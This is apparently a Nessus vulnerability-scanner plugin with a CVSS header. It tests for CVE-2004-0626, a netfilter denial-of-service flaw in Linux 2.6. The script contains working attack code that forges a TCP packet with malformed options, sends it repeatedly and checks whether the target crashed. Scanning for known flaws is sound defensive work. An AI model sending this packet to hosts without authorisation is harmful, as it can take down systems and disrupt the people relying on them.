5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.013 Low
EPSS
Percentile
85.9%
It was possible to crash the remote host by sending a specially malformed TCP/IP packet with invalid TCP options. Only version 2.6 of the Linux kernel is known to be affected by this problem. An attacker may use this flaw to disable this host remotely.
#
# (C) Tenable Network Security, Inc.
#
#
# Ref:
# From: Adam Osuchowski <adwol-AT-polsl.gliwice.pl>
# To: bugtraq-AT-securityfocus.com
# Subject: Remote DoS vulnerability in Linux kernel 2.6.x
# Date: Wed, 30 Jun 2004 12:57:17 +0200
#
include("compat.inc");
if (description)
{
script_id(12296);
script_version("1.22");
script_cvs_date("Date: 2019/03/06 18:38:55");
script_cve_id("CVE-2004-0626");
script_bugtraq_id(10634);
script_name(english:"Linux 2.6 Netfilter TCP Option Matching DoS");
script_summary(english:"Crashes the remote host");
script_set_attribute(attribute:"synopsis", value:"The remote host is prone to a denial of service attack.");
script_set_attribute(attribute:"description", value:
"It was possible to crash the remote host by sending a specially
malformed TCP/IP packet with invalid TCP options. Only version 2.6 of
the Linux kernel is known to be affected by this problem. An attacker
may use this flaw to disable this host remotely.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/367615/30/0/threaded");
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9ba1bace");
script_set_attribute(attribute:"solution", value:"Upgrade to Linux 2.6.8 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:N/I:N/A:C");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2004/06/30");
script_set_attribute(attribute:"plugin_publication_date", value:"2004/07/01");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/o:linux:kernel");
script_end_attributes();
script_category(ACT_KILL_HOST);
script_family(english:"Denial of Service");
script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
script_require_keys("Settings/ParanoidReport");
exit(0);
}
include("audit.inc");
include('global_settings.inc');
if (report_paranoia < 2) audit(AUDIT_PARANOID);
if ( TARGET_IS_IPV6 ) exit(0);
if ( islocalhost() ) exit(0);
port = get_host_open_port();
if ( ! port ) port = 22;
ip = forge_ip_packet(ip_v:4, ip_hl:5, ip_tos:0,ip_off:0,ip_len:20,
ip_p:IPPROTO_TCP, ip_id:rand() % 65535, ip_ttl:0x40,
ip_src:compat::this_host());
tcpip = forge_tcp_packet( ip : ip,
th_sport : rand() % 64000 + 1024,
th_dport : port,
th_flags : 0,
th_seq : rand() % 65535,
th_ack : 0,
th_x2 : 0,
th_off : 7,
th_win : 512,
th_urp : 0,
data : raw_string(0x02, 0x04, 0x05, 0xb4, 0x01, 0x01, 0x04, 0xfd) );
start_denial();
for ( i = 0 ; i < 5 ; i ++ ) send_packet ( tcpip, pcap_active:FALSE ) ;
alive = end_denial();
if ( ! alive )
{
security_warning(0);
set_kb_item(name:"Host/dead", value:TRUE);
}